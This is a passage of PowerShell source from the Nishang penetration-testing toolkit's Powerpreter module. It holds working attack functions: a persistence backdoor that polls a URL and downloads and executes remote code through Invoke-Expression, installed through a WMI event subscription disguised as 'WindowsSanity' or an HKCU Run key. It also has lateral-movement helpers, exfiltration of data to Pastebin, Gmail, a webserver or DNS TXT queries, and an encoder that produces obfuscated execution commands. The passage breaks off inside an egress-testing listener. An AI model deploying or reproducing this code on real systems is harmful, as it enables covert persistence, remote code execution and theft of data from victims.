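Persistence created using this function could be cleaned by using the Remove-Persistence function.

.PARAMETER CheckURL
The URL which the payload would query for instructions.

.PARAMETER PayloadURL
The URL from where commands could be sent. Function names of Powerpreter could be used here.
If the target has powershell v2 (or you are not sure), use Import-Module Update in the command.
For example: Import-Module Update; Get-Wlan-Keys

.PARAMETER PowerpreterURL
The URL from where powerpreter would be downloaded if it is removed from the user's temp directory.

.PARAMETER MagicString
The string which would act as an instruction to the payload to proceed with download and execute.

.PARAMETER StopString
The string which if found at CheckURL will stop the payload.

.PARAMETER exfil
Use this parameter to use exfiltration methods for returning the results.

.PARAMETER ExfilOption
The method you want to use for exfiltration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".

.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options

.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options

.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options. Note that it is written in clear text into update.ps1 on the target.

.PARAMETER URL
The URL of the webserver where POST requests would be sent.

.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.

.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName

.Example
PS > Persistence
The payload will ask for all required options.

.Example
PS > Persistence http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start stopthis -exfil -ExfilOption DNS -DomainName example.com -AuthNS 8.8.8.8
Use above command for using exfiltration methods.


.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>

    [CmdletBinding(DefaultParameterSetName="noexfil")] Param(

        [Parameter(Parametersetname="exfil")]
        [Switch]
        $exfil,

        [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
        [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
        [String]
        $CheckURL,

        [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
        [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
        [String]
        $PayloadURL,

        [Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
        [Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
        [String]
        $PowerpreterURL,

        [Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
        [Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
        [String]
        $MagicString,

        [Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")]
        [Parameter(Position = 4, Mandatory = $True, Parametersetname="noexfil")]
        [String]
        $StopString,

        [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
        [String]
        $ExfilOption,

        [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
        [String]
        $dev_key = "null",

        [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
        [String]
        $username = "null",

        [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
        [String]
        $password = "null",

        [Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
        [String]
        $URL = "null",

        [Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
        [String]
        $DomainName = "null",

        [Parameter(Position = 11, Mandatory = $False, Parametersetname="exfil")]
        [String]
        $AuthNS = "null"

    )

    # Polling loop appended verbatim to update.ps1 on the target (kept as a literal here-string).
    $backdoorcode = @'
function Persistence_HTTP ($CheckURL, $PayloadURL, $MagicString, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
 while($true)
 {
 $exec = 0
 start-sleep -seconds 5
 $webclient = New-Object System.Net.WebClient
 $filecontent = $webclient.DownloadString("$CheckURL")
 if($filecontent -eq $MagicString)
 {
 $pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
 $exec++
 if ($exfil -eq $True)
 {
 Do-Exfiltration "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
 }
 if ($exec -eq 1)
 {
 Start-Sleep -Seconds 60
 }
 }
 elseif ($filecontent -eq $StopString)
 {
 break
 }
 }
}
'@
    $powerpreterpath = $MyInvocation.MyCommand.Module.Path
    if (-not $powerpreterpath)
    {
        Write-Warning "Powerpreter must be imported as a module (Import-Module .\Powerpreter.psm1) so it can copy itself."
        return
    }

    $modulesRoot = "$home\Documents\WindowsPowerShell\Modules"
    $updatePsm1  = "$env:TEMP\Update.psm1"
    $updatePs1   = "$env:temp\update.ps1"
    $updateVbs   = "$env:temp\update.vbs"

    Copy-Item $powerpreterpath -Destination $updatePsm1

    # Launcher: a VBScript starts the hidden PowerShell so the Run value / WMI consumer has one file to call.
    # The script path is quoted ("" inside a VBS string literal) so a TEMP path containing spaces still works.
    echo "Set objShell = CreateObject(`"Wscript.shell`")" > $updateVbs
    echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file `"`"$updatePs1`"`"`")" >> $updateVbs

    # Stager. The first line uses '>' so a stale update.ps1 is overwritten; every later line must append.
    # (The original wrote the re-download line *before* the '>' line, so it was discarded and a removed
    # Update.psm1 was never fetched again.)
    echo "mkdir `"$modulesRoot\Update(x64)`", `"$modulesRoot\Update`", `"$modulesRoot\UpdateCheck`"" > $updatePs1
    echo "if (!(Test-Path `"$updatePsm1`")) {(New-Object Net.WebClient).DownloadFile(`"$PowerpreterURL`",`"$updatePsm1`")}" >> $updatePs1
    echo "`$currentpath = `"$updatePsm1`"" >> $updatePs1
    echo "Copy-Item `$currentpath -Destination `"$modulesRoot\Update`"" >> $updatePs1
    Out-File -InputObject $backdoorcode -Append $updatePs1

    # The call line is the same for both persistence methods; build it once. Values are passed
    # positionally as plain words, so arguments containing spaces are not supported here.
    $options = "Persistence_HTTP $CheckURL $PayloadURL $MagicString $StopString"
    if ($exfil)
    {
        $options = "Persistence_HTTP $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
    }

    $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
    if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
    {
        # Elevated: permanent WMI event subscription that runs the launcher on every new logon session.
        $filterNS = "root\cimv2"
        $wmiNS = "root\subscription"
        $query = @"
 Select * from __InstanceCreationEvent within 3
 where targetInstance isa 'Win32_LogonSession'
"@
        $filterName = "WindowsSanity"
        $filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
        $consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name=$filterName; ScriptFileName=$updateVbs; ScriptingEngine="VBScript"}
        Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -Arguments @{Filter=$filterPath; Consumer=$consumerPath} | Out-Null
    }
    else
    {
        # Unprivileged: HKCU Run value, fires at the user's next logon.
        New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $updateVbs -Force
    }
    Out-File -InputObject $options -Append $updatePs1

    # Start the launcher right away. The original handed the .vbs path to Invoke-Expression, which
    # relies on the .vbs file association and breaks on a TEMP path containing a space.
    & wscript.exe $updateVbs
}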
3603
3604
3605########################################################## Clear Persistence ##############################################################
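function Remove-Persistence
{
<#
.SYNOPSIS
Function which could be used to clear the persistence added by backdoors and keylogger.

.DESCRIPTION
This function reports and (with -Remove) cleans the persistence created by the Persistence function: the WMI
__EventFilter / ActiveScriptEventConsumer / __FilterToConsumerBinding named "WindowsSanity" and the HKCU Run value
named "Update". Run the function as an Administrator to remove the WMI events.
NOTE(review): other Nishang payloads that register a consumer under a different name are not matched by this
function — confirm the consumer name of each payload you used.

.PARAMETER Remove
Without this switch only a report is printed; with it the persistence artifacts are removed.

.Example
PS > Remove-Persistence

.Example
PS > Remove-Persistence -Remove

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0)] [Switch]
        $Remove
    )

    $runKeyPath = "HKCU:Software\Microsoft\Windows\CurrentVersion\Run\"
    $filterName = "WindowsSanity"
    $wmiNS = "root\subscription"
    $bindingFilter = "Filter = ""__eventfilter.name='$filterName'"""

    if ($Remove)
    {
        $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
        if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
        {
            Write-Warning "Run the Command as an Administrator. Removing Registry keys only."
            Remove-ItemProperty -Path $runKeyPath -Name Update -ErrorAction SilentlyContinue
            # 'return', not 'break': a bare break inside a function escapes into the caller's
            # enclosing loop or ends the calling script.
            return
        }

        Write-Output "Removing the WMI Events."
        # Each object is selected by name so unrelated subscriptions on the host are left alone
        # (the original removed every ActiveScriptEventConsumer in the namespace).
        Get-WmiObject __FilterToConsumerBinding -Namespace $wmiNS -Filter $bindingFilter | Remove-WmiObject
        Get-WmiObject __EventFilter -Namespace $wmiNS -Filter "name='$filterName'" | Remove-WmiObject
        Get-WmiObject ActiveScriptEventConsumer -Namespace $wmiNS -Filter "name='$filterName'" | Remove-WmiObject
        Write-Output "Removing the Registry keys."
        Remove-ItemProperty -Path $runKeyPath -Name Update -ErrorAction SilentlyContinue
    }

    # Report what is (still) present; both mechanisms are checked independently, so a host carrying
    # both is reported for both. The WMI queries fail silently for a non-admin caller.
    $Regkey = Get-ItemProperty -Path $runKeyPath -Name Update -ErrorAction SilentlyContinue
    $wmi_1 = Get-WmiObject __EventFilter -Namespace $wmiNS -Filter "name='$filterName'" -ErrorAction SilentlyContinue
    $wmi_2 = Get-WmiObject ActiveScriptEventConsumer -Namespace $wmiNS -Filter "name='$filterName'" -ErrorAction SilentlyContinue
    $wmi_3 = Get-WmiObject __FilterToConsumerBinding -Namespace $wmiNS -Filter $bindingFilter -ErrorAction SilentlyContinue

    $found = $false
    if ($null -ne $Regkey)
    {
        $found = $true
        Write-Warning "Run Registry key persistence found. Use with -Remove option to clean."
    }
    if ($wmi_1 -and $wmi_2 -and $wmi_3)
    {
        $found = $true
        Write-Warning "WMI permanent event consumer persistence found. Use with -Remove option to clean."
    }
    if (-not $found)
    {
        Write-Output "No Persistence found."
    }
}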
3664
3665
3666#########################################################Pivoting to other systems##########################################################
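function Pivot
{

<#
.SYNOPSIS
Function which provides pivoting to other machines in a network.

.DESCRIPTION
The functionality uses powershell remoting to connect to remote machines. Pivoting could be interactive or non-interactive.
Credentials are required to use this function. Username/pass or a shell with rights to access remote machines could be used as credentials.

.PARAMETER Computer
Name of the computer(s) to connect to.

.PARAMETER User
Username to be used to connect to the target (optional).

.PARAMETER Pass
Password to be used to connect to the target (optional). It is taken in clear text and therefore ends up in the
command history and in the process command line; prefer a shell that already holds the rights when possible.

.PARAMETER cmd
Cmd to be executed on the target. Mandatory in case of non-interactive.

.PARAMETER Non_Interactive
If specified, the pivoting is non-interactive. It is interactive by default.

.EXAMPLE
PS > Pivot -Computer <target>
Above command uses the credentials available with current powershell session (or other shell) to connect to target.
It creates PSSessions. Use Use-Session to interact with the created sessions.

.EXAMPLE
PS > Pivot -Computer (Get-Content .\targets.txt) -User Administrator -Pass P@ssword123#
Above command uses the given username and password and creates PSSessions. Use Use-Session to
interact with the created sessions.

.EXAMPLE
PS > Pivot -Computer <target> -cmd Get-Process -Non_Interactive
Above command uses the credentials available with current powershell session (or other shell) to connect to target.
It provides a non-interactive pivot. Get-Process is executed on the target.

.EXAMPLE
PS > Pivot -Computer <target> -User Administrator -Pass P@ssword123# -cmd Get-Process -Non_Interactive
Above command uses the given username and password and executes Get-Process on the target.

.LINK
https://github.com/samratashok/nishang
#>



    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String[]]
        $Computer,

        [Parameter(Position = 1)]
        [String]
        $User,

        [Parameter(Position = 2)]
        [String]
        $Pass,

        [Parameter(Position = 3)]
        [String]
        $cmd,

        [Switch] $Non_Interactive
    )

    # Build the optional credential once and splat it into every remoting call.
    $connArgs = @{}
    if ($User)
    {
        $Passwd = ConvertTo-SecureString $Pass -AsPlainText -Force
        $connArgs.Credential = New-Object System.Management.Automation.PSCredential ($User, $Passwd)
    }

    if (-not $Non_Interactive)
    {
        #Interactive pivoting: one PSSession per target; interact with them via Use-Session.
        foreach ($comp in $Computer)
        {
            New-PSSession -ComputerName $comp @connArgs
        }
    }
    else
    {
        #Non-Interactive pivoting (command execution on remote machines) using Invoke-Command
        if (-not $cmd)
        {
            Write-Warning "-cmd is mandatory for non-interactive pivoting."
            return
        }
        $sb = [scriptblock]::Create($cmd)
        foreach ($comp in $Computer)
        {
            # The original, when no -User was given, ran the script block {$Command}: that variable
            # exists on neither side, so nothing was executed and nothing was printed.
            $result = Invoke-Command -ComputerName $comp -ScriptBlock $sb @connArgs
            "Output of command on $comp " + $result
        }
    }

}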
3784
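function Use-Session
{
<#
.SYNOPSIS
Function which could be used to interact with sessions created using Pivot.

.DESCRIPTION
The functionality allows to interact with sessions created using the Pivot function. Use Get-PSSession to
list the sessions created using Pivot. Each line typed at the prompt is run in the remote session with
Invoke-Command; typing exit ends the prompt loop (the session itself is left open).

.PARAMETER id
ID of the session to interact with.

.EXAMPLE
PS > Use-Session -id <id>
Above command opens a prompt on the session with the given ID; commands entered are executed on the remote computer.

.LINK
https://github.com/samratashok/nishang
#>
    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        $id
    )

    $sess = Get-PSSession -Id $id
    if (-not $sess)
    {
        Write-Warning "No PSSession with Id $id. Use Get-PSSession to list the available sessions."
        return
    }
    $computername = $sess.ComputerName

    while ($true)
    {
        Write-Host -NoNewline "$computername> "
        $cmd = Read-Host
        # Check before executing: the original tested the previous command and so sent 'exit' to the
        # remote session first. Empty lines are skipped instead of being run as an empty script block.
        if ($cmd -eq "exit") { break }
        if ([string]::IsNullOrWhiteSpace($cmd)) { continue }
        $sb = [scriptblock]::Create($cmd)
        Invoke-Command -ScriptBlock $sb -Session $sess
    }
}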
3821
3822
3823#####################################################Exfiltration Functionality################################################
3824
3825function Do-Exfiltration
3826{
3827<#
3828.SYNOPSIS
3829Use this function to exfiltrate data from a target.
3830
3831.DESCRIPTION
3832This function could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
3833and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.
3834
3835.PARAMETER Data
3836The data to be exfiltrated. Could be supplied by pipeline.
3837
3838.PARAMETER ExfilOption
3839The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
3840
3841.PARAMETER dev_key
3842The Unique API key provided by pastebin when you register a free account.
3843Unused for other options
3844
3845.PARAMETER username
3846Username for the pastebin/gmail account where data would be exfiltrated.
3847Unused for other options
3848
3849.PARAMETER password
3850Password for the pastebin/gmail account where data would be exfiltrated.
3851Unused for other options
3852
3853.PARAMETER URL
3854The URL of the webserver where POST requests would be sent.
3855
3856.PARAMETER DomainName
3857The DomainName, whose subdomains would be used for sending TXT queries to.
3858
3859.PARAMETER AuthNS
3860Authoritative Name Server for the domain specified in DomainName
3861
3862
3863.EXAMPLE
3864PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
3865
3866Use above command for data exfiltration to gmail
3867
3868.EXAMPLE
3869PS > Get-Information | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
3870
3871Use above command for data exfiltration to a webserver which logs POST requests.
3872
3873
3874.EXAMPLE
3875PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228
3876
3877Use above command for data exfiltration to a DNS server which logs TXT queries.
3878
3879
3880.LINK
3881http://labofapenetrationtester.com/
3882https://github.com/samratashok/nishang
3883#>
3884
3885 [CmdletBinding()] Param(
3886
3887 [Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
3888 [String]
3889 $Data,
3890
3891 [Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
3892 [String]
3893 $ExfilOption,
3894
3895 [Parameter(Position = 2, Mandatory = $False)]
3896 [String]
3897 $dev_key,
3898
3899 [Parameter(Position = 3, Mandatory = $False)]
3900 [String]
3901 $username,
3902
3903 [Parameter(Position = 4, Mandatory = $False)]
3904 [String]
3905 $password,
3906
3907 [Parameter(Position = 5, Mandatory = $False)]
3908 [String]
3909 $URL,
3910
3911 [Parameter(Position = 6, Mandatory = $False)]
3912 [String]
3913 $DomainName,
3914
3915 [Parameter(Position = 7, Mandatory = $False)]
3916 [String]
3917 $AuthNS
3918 )
3919
3920 function post_http($url,$parameters)
3921 {
3922 $http_request = New-Object -ComObject Msxml2.XMLHTTP
3923 $http_request.open("POST", $url, $false)
3924 $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
3925 $http_request.setRequestHeader("Content-length", $parameters.length);
3926 $http_request.setRequestHeader("Connection", "close")
3927 $http_request.send($parameters)
3928 $script:session_key=$http_request.responseText
3929 }
3930
3931 function Compress-Encode
3932 {
3933 #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
3934 $ms = New-Object IO.MemoryStream
3935 $action = [IO.Compression.CompressionMode]::Compress
3936 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
3937 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
3938 $Data | ForEach-Object {$sw.WriteLine($_)}
3939 $sw.Close()
3940 $Compressed = [Convert]::ToBase64String($ms.ToArray())
3941 return $Compressed
3942 }
3943
3944 if ($exfiloption -eq "pastebin")
3945 {
3946 $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
3947 $pastevalue = [System.Convert]::ToBase64String($utfbytes)
3948 $pastename = "Exfiltrated Data"
3949 post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
3950 post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
3951 }
3952
3953 elseif ($exfiloption -eq "gmail")
3954 {
3955 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
3956 $smtpserver = "smtp.gmail.com"
3957 $msg = new-object Net.Mail.MailMessage
3958 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
3959 $smtp.EnableSsl = $True
3960 $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
3961 $msg.From = "$username@gmail.com"
3962 $msg.To.Add("$username@gmail.com")
3963 $msg.Subject = "Exfiltrated Data"
3964 $msg.Body = $Data
3965 if ($filename)
3966 {
3967 $att = new-object Net.Mail.Attachment($filename)
3968 $msg.Attachments.Add($att)
3969 }
3970 $smtp.Send($msg)
3971 }
3972
3973 elseif ($exfiloption -eq "webserver")
3974 {
3975 $Data = Compress-Encode
3976 post_http $URL $Data
3977 }
3978 elseif ($ExfilOption -eq "DNS")
3979 {
3980 $code = Compress-Encode
3981 $queries = [int]($code.Length/63)
3982 while ($queries -ne 0)
3983 {
3984 $querystring = $code.Substring($lengthofsubstr,63)
3985 Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
3986 $lengthofsubstr += 63
3987 $queries -= 1
3988 }
3989 $mod = $code.Length%63
3990 $query = $code.Substring($code.Length - $mod, $mod)
3991 Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
3992
3993 }
3994
3995}
3996
3997################################################Compress and Encode scripts and strings###############################
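function Invoke-Encode
{
<#
.SYNOPSIS
Script for Nishang to encode and compress plain data.

.DESCRIPTION
The script takes the path of a plain text file (or a string, with -IsString), Deflate-compresses it,
Base64-encodes the result and writes it to a file "encoded.txt" in the current working directory.
The output is the format expected by Invoke-Decode.

If the switch -OutCommand is used, an encoded command which could be executed on a non-powershell console is also generated.
The encoded command is useful in case of non-interactive shells like webshell or when special characters in scripts may
create problems, for example, a meterpreter session.

.PARAMETER DataToEncode
The path of the file to be encoded. Use with -IsString to pass a string instead of a path.

.PARAMETER OutputFilePath
The path of the output file. Default is "encoded.txt" in the current working directory.

.PARAMETER OutputCommandFilePath
The path of the output file where the encoded command would be written. Default is "encodedcommand.txt" in the current working directory.

.PARAMETER IsString
Use this to specify that you are passing a string in place of a file path.

.PARAMETER OutCommand
Generate an encoded command which could be used with the -EncodedCommand parameter of PowerShell.
The generated command decompresses the data in memory and runs it with Invoke-Expression.

.PARAMETER PostScriptCommand
Generate a PowerShell one-liner which is much smaller than the -EncodedCommand form. Useful in scenarios where
longer commands or scripts could not be used. This form is also written automatically when the Base64
-EncodedCommand form would exceed the Windows command line length limit.

.EXAMPLE

PS > Invoke-Encode -DataToEncode C:\scripts\data.txt

Use above command to generate encoded data which could be Decoded using the Invoke-Decode script.


PS > Invoke-Encode -DataToEncode C:\scripts\evil.ps1 -OutCommand

Use above command to generate encoded data and encoded command which could be used on a non-powershell console.
Use powershell -EncodedCommand <generated code here>


.EXAMPLE

PS > Invoke-Encode "A Secret message" -IsString

Use above to encode a string.


.EXAMPLE

PS > Invoke-Encode Get-Process -IsString -OutCommand

Use above to encode a command.


.LINK
http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
https://github.com/samratashok/nishang

#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $DataToEncode,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $OutputFilePath = ".\encoded.txt",

        [Parameter(Position = 2, Mandatory = $False)]
        [String]
        $OutputCommandFilePath = ".\encodedcommand.txt",

        [Switch]
        $OutCommand,

        [Switch]
        $IsString,

        [Switch]
        $PostScriptCommand

    )
    if($IsString -eq $true)
    {
        $Enc = $DataToEncode
    }
    else
    {
        #Fail loudly instead of silently writing an (almost) empty encoded file when the input is missing.
        if (-not (Test-Path -Path $DataToEncode -PathType Leaf))
        {
            throw "Invoke-Encode: input file '$DataToEncode' not found."
        }
        #One string per line; non-ASCII characters are lost here and in the ASCII writer below.
        $Enc = Get-Content $DataToEncode -Encoding Ascii
    }


    #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
    $ms = New-Object IO.MemoryStream
    $action = [IO.Compression.CompressionMode]::Compress
    $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
    $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
    $Enc | ForEach-Object {$sw.WriteLine($_)}
    #Closing the writer flushes and closes the deflate stream and memory stream; ToArray() still works afterwards.
    $sw.Close()

    # Base64 encode stream
    $Compressed = [Convert]::ToBase64String($ms.ToArray())
    Out-File -InputObject $Compressed -FilePath $OutputFilePath
    Write-Output "Encoded data written to $OutputFilePath"

    if (($OutCommand -eq $True) -or ($PostScriptCommand -eq $True))
    {
        #http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
        #The one-liner below inlines $Compressed and evaluates the decompressed text with Invoke-Expression;
        #it is the script's own payload, so this is by design rather than untrusted-input evaluation.
        $command = "Invoke-Expression `$(New-Object IO.StreamReader (" +

        "`$(New-Object IO.Compression.DeflateStream (" +

        "`$(New-Object IO.MemoryStream (,"+

        "`$([Convert]::FromBase64String('$Compressed')))), " +

        "[IO.Compression.CompressionMode]::Decompress)),"+

        " [Text.Encoding]::ASCII)).ReadToEnd();"

        #Generate Base64 encoded command to use with the powershell -encodedcommand parameter
        #(-EncodedCommand expects UTF-16LE Base64).
        $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
        $EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command))
        #Check for max. length supported by Windows (8191 characters for a command line). Only the Base64
        #payload is measured here, not the "powershell -EncodedCommand " prefix, so the margin is thin.
        #If the base64 encoded command is longer, use the one-liner instead.
        if (($EncScript.Length -gt 8190) -or ($PostScriptCommand -eq $True))
        {
            Out-File -InputObject $command -FilePath $OutputCommandFilePath
            Write-Output "Encoded command written to $OutputCommandFilePath"
        }
        else
        {
            Out-File -InputObject $EncScript -FilePath $OutputCommandFilePath
            Write-Output "Encoded command written to $OutputCommandFilePath"
        }
    }
}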
4141
4142################################################Decode scripts and strings encoded by Invoke-Encode###############################
4143
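function Invoke-Decode
{
<#
.SYNOPSIS
Script for Nishang to decode the data encoded by Invoke-Encode, DNS TXT and POST exfiltration methods.

.DESCRIPTION
The script takes an encoded string (or the path of a file containing it), Base64-decodes and
Deflate-decompresses it and writes the result to a file "decoded.txt" in the current working directory.
Both the encoding and decoding is based on the code by ikarstein.

.PARAMETER EncodedData
The path of the file to be decoded. Use with -IsString to pass the encoded string directly.


.PARAMETER OutputFilePath
The path of the output file. Default is "decoded.txt" in the current working directory.

.PARAMETER IsString
Use this to specify that you are passing a string in place of a file path.

.EXAMPLE

PS > Invoke-Decode -EncodedData C:\files\encoded.txt

.EXAMPLE

PS > Invoke-Decode c08t0Q0oyk9OLS7m5QIA -IsString

Use above to decode a string.

.LINK
http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
https://github.com/samratashok/nishang

#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $EncodedData,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $OutputFilePath = ".\decoded.txt",

        [Switch]
        $IsString
    )

    if($IsString -eq $true)
    {
        $data = $EncodedData
    }
    else
    {
        #Fail loudly instead of passing $null to FromBase64String when the input is missing.
        if (-not (Test-Path -Path $EncodedData -PathType Leaf))
        {
            throw "Invoke-Decode: input file '$EncodedData' not found."
        }
        #Get-Content yields one string per line; join them so a wrapped Base64 file still decodes.
        $data = (Get-Content $EncodedData -Encoding UTF8) -join ''
    }
    $dec = [System.Convert]::FromBase64String($data)
    #The unary comma keeps the byte array as a single constructor argument; the stream starts at position 0.
    $ms = New-Object System.IO.MemoryStream (,$dec)
    $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
    $sr = New-Object System.IO.StreamReader($cs)
    try
    {
        $output = $sr.readtoend()
    }
    finally
    {
        #Closing the reader also closes the deflate and memory streams beneath it.
        $sr.Close()
    }
    Out-File -InputObject $output -FilePath $OutputFilePath
    Write-Host "Decode data written to $OutputFilePath"
}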
4212
4213############################################### Listener for Egress testing #############################################################
4214<#
4215.SYNOPSIS
FireListener is a function that does egress testing. It is to be run on the attacking/listening machine.
4217
4218.DESCRIPTION
4219FireListener hosts a listening server to which FireBuster can send packets to. Firebuster is to be run on the target machine which is to
4220be tested for egress filtering.
4221
4222.EXAMPLE
4223PS > FireListener -portrange 1000-1020
4224
4225.LINK
4226http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
4227https://github.com/samratashok/nishang
4228http://roo7break.co.uk
4229
4230.NOTES
4231Based on the script written by Nikhil ShreeKumar (@roo7break)
4232#>
4233
4234
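function FireListener
{
    Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $PortRange
    )

    #Socket and job errors are routine while probing; silence them for this function's
    #scope only (the assignment creates a function-local preference variable).
    $ErrorActionPreference = 'SilentlyContinue'
    #Code which opens a socket for each port. It runs inside a background job, so it only
    #sees what is passed through -ArgumentList.
    $socketblock = {
        param($port)
        try
        {
            #Binds to every interface: anything able to reach this host may connect.
            $EndPoint = New-Object System.Net.IPEndPoint([ipaddress]::any, $port)
            $ListenSocket = New-Object System.Net.Sockets.TCPListener $EndPoint
            $ListenSocket.Start()
            $RecData = $ListenSocket.AcceptTCPClient()
            $clientip = $RecData.Client.RemoteEndPoint.Address.ToString()
            $clientport = $RecData.Client.LocalEndPoint.Port.ToString()
            Write-Host "$clientip connected through port $clientport" -ForegroundColor Green
            #Close the accepted client, then the listener, so the port is released before the
            #job completes and the main loop re-opens it. (The earlier `$Stream.Close()` hit an
            #undefined variable, threw inside this try and skipped Stop().)
            $RecData.Close()
            $ListenSocket.Stop()
        } catch
        { Write-Error $Error[0] }
    }

    #Accept "low-high" or a single port.
    $bounds = $PortRange.split("-")
    [int] $lowport = $bounds[0]
    [int] $highport = if ($bounds.Length -gt 1) { $bounds[1] } else { $bounds[0] }
    [int] $ports = 0
    #NOTE: this removes every job in the session, not only ones started by FireListener.
    Get-Job | Remove-Job

    #Start a job for each port
    for($ports=$lowport; $ports -le $highport; $ports++)
    {
        "Listening on port $ports"
        $job = start-job -ScriptBlock $socketblock -ArgumentList $ports -Name $ports
    }


    [console]::TreatControlCAsInput = $true
    while ($true)
    {
        # code from http://poshcode.org/542 to capture Ctrl+C
        # start code snip
        if ($Host.UI.RawUI.KeyAvailable -and (3 -eq [int]$Host.UI.RawUI.ReadKey("AllowCtrlC,IncludeKeyUp,NoEcho").Character))
        {
            Write-Host "Stopping all jobs.....This can take many minutes." -Background DarkRed
            Sleep 2
            Get-Job | Stop-Job
            Get-Job | Remove-Job
            #Stop-Process -Id $PID
            break;
        }
        # end code snip


        #Start a new job which listens on the same port for every completed job.
        #A job completes after it has accepted one connection (or failed to bind).
        foreach ($job1 in (Get-Job))
        {
            Start-Sleep -Seconds 4
            Get-Job | Receive-Job
            if ($job1.State -eq "Completed")
            {
                $port = $job1.Name
                "Listening on port $port"
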